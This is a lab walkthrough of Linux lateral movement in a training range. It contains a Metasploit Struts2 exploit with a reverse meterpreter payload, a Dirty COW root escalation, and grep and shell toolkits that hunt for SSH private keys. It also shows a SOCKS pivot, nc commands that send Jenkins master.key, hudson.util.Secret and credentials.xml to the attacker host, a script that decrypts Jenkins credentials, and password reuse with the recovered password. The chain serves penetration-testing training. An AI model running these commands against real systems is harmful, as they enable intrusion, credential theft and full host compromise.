Article contents
Chapter topics
IPC, WMI, SMB, PTH, PTK, PTT, SPN, WinRM, WinRS, RDP, Plink, DCOM, SSH, Exchange, LLMNR poisoning, NTLM relay, Kerberos TGS, GPO & DACL, domain controller privilege escalation vulnerabilities, constrained delegation, database attack and defence, system patch distribution and execution, EDR targeted distribution and execution, etc.
Linux range (lab) setup
Lateral Movement - Linux Range - SSH Protocol & RSA Key Credentials
~/.ssh/config
~/.ssh/known_hosts
~/.bash_history
Normally SSH keys live in ~/.ssh/, and the three files above show where the owner has already connected. Private keys saved elsewhere on disk can be located by grepping the filesystem for their PEM headers (the last pattern covers the newer OpenSSH-format keys; add -l to print only file names, and exclude /proc and /sys or the search is slow and noisy):
grep -ir "BEGIN RSA PRIVATE KEY" /*
grep -ir "BEGIN DSA PRIVATE KEY" /*
grep -ir "BEGIN OPENSSH PRIVATE KEY" /*
Reference: https://www.runoob.com/w3cnote/set-ssh-login-key.html
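As an added example (not part of the original notes): a small POSIX shell toolkit that does the hunt above properly. It prunes /proc, /sys, /dev and /run, reports the key type, tells a passphrase-protected key from a plaintext one (the PEM Proc-Type header, the PKCS#8 ENCRYPTED header, and the cipher/kdf strings at the start of the OpenSSH format), and pulls the owner's known hosts out of the three files listed above. The fixture written by make_sample_keys is constructed for this example; the 172.16.250.30 address in it is only borrowed from the range described later.

```shell
#!/bin/sh
# Added example (not part of the original notes): hunt for SSH private keys under a
# root directory, report each key's type and whether it is passphrase-protected, and
# list the hosts a key's owner has already reached. Only find, grep, sed, tr, dd and
# base64 are used, so it runs from a bare shell on the compromised host.

# find_private_keys ROOT
# Prints "path<TAB>type<TAB>plaintext|encrypted|unknown" for every private key file.
# /proc, /sys, /dev and /run are pruned (grep -r /* reads them and is slow and noisy),
# and files over 64 KiB are skipped because keys are small.
find_private_keys() {
  root=${1:-/}; root=${root%/}
  find "$root/" \( -path "$root/proc" -o -path "$root/sys" -o -path "$root/dev" -o -path "$root/run" \) -prune \
       -o -type f -size -65536c -exec grep -l -e '-----BEGIN .*PRIVATE KEY-----' {} + 2>/dev/null |
  while IFS= read -r f; do
    ktype=$(sed -n 's/^-----BEGIN \(.*\) PRIVATE KEY-----.*/\1/p' "$f" | sed -n 1p)
    [ -n "$ktype" ] || ktype=PKCS8      # "-----BEGIN PRIVATE KEY-----" carries no algorithm name
    printf '%s\t%s\t%s\n' "$f" "$ktype" "$(key_encryption_state "$f")"
  done
}

# key_encryption_state FILE -> plaintext | encrypted | unknown
key_encryption_state() {
  f=$1
  if grep -q '^Proc-Type: 4,ENCRYPTED' "$f"; then echo encrypted; return; fi                 # classic PEM + passphrase
  if grep -q '^-----BEGIN ENCRYPTED PRIVATE KEY-----' "$f"; then echo encrypted; return; fi  # PKCS#8 + passphrase
  if grep -q '^-----BEGIN OPENSSH PRIVATE KEY-----' "$f"; then
    # OpenSSH format: the base64 body decodes to "openssh-key-v1\0" + cipher name + kdf name;
    # an unprotected key says none/none, a protected one names a cipher and "bcrypt".
    hdr=$(sed -n '/^-----BEGIN OPENSSH/,/^-----END OPENSSH/p' "$f" | grep -v '^-----' | tr -d '\n' |
          base64 -d 2>/dev/null | tr -d '\000' | dd bs=1 count=48 2>/dev/null)
    case $hdr in *bcrypt*) echo encrypted ;; *none*) echo plaintext ;; *) echo unknown ;; esac
    return
  fi
  echo plaintext
}

# ssh_targets HOMEDIR
# Hosts the owner of HOMEDIR has talked to: known_hosts entries (hashed "|1|" lines carry
# no hostname and are skipped), HostName lines from ~/.ssh/config and ssh commands from
# ~/.bash_history. Pair these with the keys found above to pick the next hop.
ssh_targets() {
  h=$1
  {
    [ -f "$h/.ssh/known_hosts" ] && grep -v '^|1|' "$h/.ssh/known_hosts" | cut -d' ' -f1 | tr ',' '\n'
    [ -f "$h/.ssh/config" ] && awk 'tolower($1)=="hostname"{print $2}' "$h/.ssh/config"
    [ -f "$h/.bash_history" ] && grep -o 'ssh [^|;&]*' "$h/.bash_history"
    :
  } | sort -u
}

# make_sample_keys DIR: constructed fixture (made up for this example) laid out like a
# small filesystem, including a decoy under DIR/proc that must not be reported.
make_sample_keys() {
  d=$1
  mkdir -p "$d/home/alice/.ssh" "$d/home/bob/.ssh" "$d/opt/backup" "$d/proc/1"
  printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'MIIEowIBAAKCAQEAfake' '-----END RSA PRIVATE KEY-----' >"$d/home/alice/.ssh/id_rsa"
  printf '%s\n' '-----BEGIN DSA PRIVATE KEY-----' 'Proc-Type: 4,ENCRYPTED' \
    'DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF' '' 'MIIBfakeDSA' '-----END DSA PRIVATE KEY-----' >"$d/opt/backup/old.pem"
  { printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----'
    printf 'openssh-key-v1\000\000\000\000\012aes256-ctr\000\000\000\006bcrypt\000\000\000\030\000\000\000\020saltsaltsaltsalt\000\000\000\020' | base64
    printf '%s\n' '-----END OPENSSH PRIVATE KEY-----'; } >"$d/home/bob/.ssh/id_ed25519"
  printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'decoy' '-----END RSA PRIVATE KEY-----' >"$d/proc/1/environ"
  printf '%s\n' '172.16.250.30 ssh-ed25519 AAAAC3fake' '|1|hashedhost|hashedkey ssh-rsa AAAAB3fake' >"$d/home/alice/.ssh/known_hosts"
  printf '%s\n' 'ls' 'ssh -i ~/.ssh/id_rsa root@172.16.250.30' >"$d/home/alice/.bash_history"
}

# On a live host: find_private_keys / ; ssh_targets /root
# Demo against the constructed fixture:
demo=$(mktemp -d); make_sample_keys "$demo"
find_private_keys "$demo"; ssh_targets "$demo/home/alice"
rm -rf "$demo"
```

The OpenSSH-format check is the one worth keeping: id_ed25519 files never carry a Proc-Type header, so a grep for that alone reports every modern key as unprotected.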
Lateral Movement - Linux Range - Privilege Escalation & SSH & Keys & Jenkins, etc.
Kali can only reach the LAN segment the web host (172.16.250.10) sits on.
1. Web host (DMZ): gaining access
Information gathering:
nmap 172.16.250.0/24
172.16.250.10: port 80 open, /struts2-showcase present
Exploitation:
msfconsole
use exploit/multi/http/struts2_content_type_ognl
set payload linux/x64/meterpreter/reverse_tcp
set rhosts 172.16.250.10
set lport 80
run
Privilege escalation (an in-memory Dirty COW, CVE-2016-5195, exploit):
curl -o /root/dirtycow-mem.c https://raw.githubusercontent.com/sqlnetcat/dirtycow-mem/master/dirtycow-mem.c    # on Kali; saves the source that the next step uploads
upload /root/dirtycow-mem.c /tmp    # meterpreter
shell
cd /tmp && gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread    # needs gcc on the target
python3 -c "import pty;pty.spawn('/bin/bash')"    # upgrade to an interactive tty first, otherwise the root shell is unusable
./dirtycow-mem
Keeping the box stable afterwards (the exploit can leave the kernel unstable):
echo 0 > /proc/sys/vm/dirty_writeback_centisecs    # 0 disables the kernel's periodic writeback of dirty pages altogether
echo 1 > /proc/sys/kernel/panic && echo 1 > /proc/sys/kernel/panic_on_oops && echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi && echo 1 > /proc/sys/kernel/panic_on_io_nmi && echo 1 > /proc/sys/kernel/panic_on_warn    # kernel.panic=1 reboots one second after a panic instead of hanging; the panic_on_* switches turn an oops, NMI or warning into a panic, so a kernel error triggered by the exploit reboots the box rather than leaving it wedged or quietly corrupting data
Lateral movement:
cat /opt/tomcat/webapps/kittens/WEB-INF/config/opencms.properties    # database config; the site and its database are on separate hosts, so this is where the DB host and credentials are
Read the shell history for hosts the admin has already reached over SSH, then try them with root's key:
cat ~/.bash_history
cp ~/.ssh/id_rsa /tmp/id_rsa
chmod 777 /tmp/id_rsa    # world-readable so the unprivileged meterpreter process can download it
download /tmp/id_rsa /root/id_rsa    # meterpreter, back to Kali
chmod 600 id_rsa    # ssh refuses a key with looser permissions
ssh -i id_rsa [email protected]
2. Jenkins host (DMZ): gaining access
Information gathering (on the web host):
getuid
netstat -anpt    # existing connections reveal the next hop
172.16.250.30: port 8080 open
Set up a pivot:
use auxiliary/server/socks_proxy    # add a route for 172.16.250.0/24 through the meterpreter session first, or the SOCKS listener (port 1080 by default) has nothing to forward through
vim /etc/proxychains4.conf    # point the [ProxyList] entry at the SOCKS listener
Note the chain mode:
dynamic_chain: proxies in the list that fail are skipped, so the chain works as long as at least one of them is up
strict_chain: every proxy in the list must be reachable, in order, or the connection fails
Jenkins is served on 172.16.250.30:8080:
proxychains firefox
Attacking Jenkins:
Pull the secret files back with nc. If the database host (.50) is later to be brought online through .30, that traffic has to be wrapped in an SSH tunnel, because .10 can reach port 22 on .30. nc does no integrity checking, so compare a checksum of each file on both ends after the transfer.
nc -lvp 1234 > master.key    # on Kali (172.16.250.128), one listener per file
nc -lvp 1234 > hudson.util.Secret
nc -lvp 1234 > credentials.xml
nc 172.16.250.128 1234 < /home/jenkins/secrets/hudson.util.Secret    # on the Jenkins host
nc 172.16.250.128 1234 < /home/jenkins/secrets/master.key
nc 172.16.250.128 1234 < /home/jenkins/credentials.xml
Crack the key:
https://github.com/cheetz/jenkins-decrypt
python decrypt.py master.key hudson.util.Secret credentials.xml
Note: an older Python 3 is needed for the decryption to work.
The password recovered after decryption is: )uDvra{4UL^;r?*h
Use this credential from the Jenkins service on .30 to move laterally.
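What decrypt.py does, as an added example written for these notes (it is neither the page's nor jenkins-decrypt's code): the derivation chain from master.key through hudson.util.Secret to a credentials.xml secret, in shell with openssl, od and dd, covering both the current {base64} format and the old bare-base64 format. jenkins_build_sample writes constructed fixtures laid out the way Jenkins does; the master.key contents, the payload bytes, the IV and the two passwords in it are made up for the example.

```shell
#!/bin/sh
# Added example (not code from the original notes or from jenkins-decrypt): the Jenkins
# credential-decryption chain reimplemented with openssl, od and dd so it can be checked
# by hand.
#   master.key  --SHA-256, first 16 bytes-->  AES-128 master key          (Util.toAes128Key)
#   hudson.util.Secret  --AES-128-ECB/PKCS#5 decrypt-->  256 random bytes + "::::MAGIC::::"
#   first 16 bytes of that payload  -->  the key that protects credentials.xml secrets
#   "{base64}" secret (current): 0x01 | iv len (4B BE) | data len (4B BE) | iv | AES-128-CBC/PKCS#5 ciphertext
#   bare base64 secret (old):    AES-128-ECB/PKCS#5 of password + "::::MAGIC::::"
MAGIC='::::MAGIC::::'

hex() { od -An -v -tx1 | tr -d ' \n'; }      # stdin bytes -> lowercase hex
be32() {                                      # 4-byte big-endian integer on stdout (POSIX printf octal escapes)
  printf "$(printf '\\%03o\\%03o\\%03o\\%03o' $(($1>>24&255)) $(($1>>16&255)) $(($1>>8&255)) $(($1&255)))"
}

# jenkins_master_aes_key MASTER_KEY_FILE -> hex AES-128 key
jenkins_master_aes_key() {
  tr -d '\n' <"$1" | openssl dgst -sha256 -binary | dd bs=1 count=16 2>/dev/null | hex
}

# jenkins_secret_key MASTER_KEY_FILE HUDSON_UTIL_SECRET_FILE -> hex key for credentials.xml
# Fails when MAGIC is absent after decryption, i.e. the master.key does not belong to this secret.
jenkins_secret_key() {
  mk=$(jenkins_master_aes_key "$1") || return 1
  plain=$(mktemp)
  if ! openssl enc -d -aes-128-ecb -K "$mk" -in "$2" -out "$plain" 2>/dev/null || ! grep -q "$MAGIC" "$plain"; then
    rm -f "$plain"; echo "master.key does not decrypt hudson.util.Secret (no MAGIC)" >&2; return 1
  fi
  dd if="$plain" bs=1 count=16 2>/dev/null | hex
  rm -f "$plain"
}

# jenkins_decrypt_credential KEY_HEX ENCODED_SECRET -> plaintext on stdout
jenkins_decrypt_credential() {
  key=$1; enc=$2
  case $enc in
    '{'*'}')                                  # current format
      enc=${enc#\{}; enc=${enc%\}}
      p=$(mktemp); printf '%s' "$enc" | base64 -d >"$p"
      set -- $(od -An -tu1 -N 9 "$p")         # version byte, iv length, data length
      if [ "$1" != 1 ]; then rm -f "$p"; echo "unsupported payload version $1" >&2; return 1; fi
      ivlen=$((($2<<24)|($3<<16)|($4<<8)|$5)); datalen=$((($6<<24)|($7<<16)|($8<<8)|$9))
      iv=$(dd if="$p" bs=1 skip=9 count="$ivlen" 2>/dev/null | hex)
      dd if="$p" bs=1 skip=$((9+ivlen)) count="$datalen" 2>/dev/null | openssl enc -d -aes-128-cbc -K "$key" -iv "$iv"
      st=$?; rm -f "$p"; return $st ;;
    *)                                        # old format: drop MAGIC and whatever follows it
      printf '%s' "$enc" | base64 -d | openssl enc -d -aes-128-ecb -K "$key" | sed "s/$MAGIC.*//" ;;
  esac
}

# jenkins_build_sample DIR: write a constructed master.key, hudson.util.Secret and two
# encoded secrets laid out the way Jenkins stores them, so the functions above can be
# exercised offline. Every value here is made up for the example; Jenkins uses random ones.
jenkins_build_sample() {
  d=$1; mkdir -p "$d/secrets"
  printf '%s' '0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef' >"$d/secrets/master.key"
  mk=$(jenkins_master_aes_key "$d/secrets/master.key")
  # payload = 256 "random" bytes (all 'K' here) + MAGIC, AES-128-ECB/PKCS#5 under the master key
  { dd if=/dev/zero bs=1 count=256 2>/dev/null | tr '\000' 'K'; printf '%s' "$MAGIC"; } |
    openssl enc -aes-128-ecb -K "$mk" -out "$d/secrets/hudson.util.Secret"
  sk=$(dd if=/dev/zero bs=1 count=16 2>/dev/null | tr '\000' 'K' | hex)    # first 16 payload bytes
  ivhex=000102030405060708090a0b0c0d0e0f                                   # fixed IV for the example
  ct=$(mktemp); printf '%s' 'S3cret!' | openssl enc -aes-128-cbc -K "$sk" -iv "$ivhex" -out "$ct"
  { printf '\001'; be32 16; be32 "$(wc -c <"$ct")"
    printf '\000\001\002\003\004\005\006\007\010\011\012\013\014\015\016\017'; cat "$ct"; } |
    base64 | tr -d '\n' | { printf '{'; cat; printf '}'; } >"$d/new_format.txt"
  printf '%s%s' 'LegacyPw' "$MAGIC" | openssl enc -aes-128-ecb -K "$sk" | base64 | tr -d '\n' >"$d/old_format.txt"
  rm -f "$ct"
}

# Demo on the constructed fixture. On a real target, point jenkins_secret_key at
# $JENKINS_HOME/secrets/master.key and hudson.util.Secret, and feed the <password>
# values from credentials.xml to jenkins_decrypt_credential.
d=$(mktemp -d); jenkins_build_sample "$d"
k=$(jenkins_secret_key "$d/secrets/master.key" "$d/secrets/hudson.util.Secret")
jenkins_decrypt_credential "$k" "$(cat "$d/new_format.txt")"; echo
jenkins_decrypt_credential "$k" "$(cat "$d/old_format.txt")"; echo
rm -rf "$d"
```

The MAGIC check is the useful diagnostic: if decryption of hudson.util.Secret yields garbage without it, the master.key came from a different Jenkins instance (or was replaced), and nothing downstream will decrypt.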
3. Database host (DMZ): gaining access
Password reuse:
ssh [email protected]
)uDvra{4UL^;r?*h
Privilege escalation:
getuid
sudo su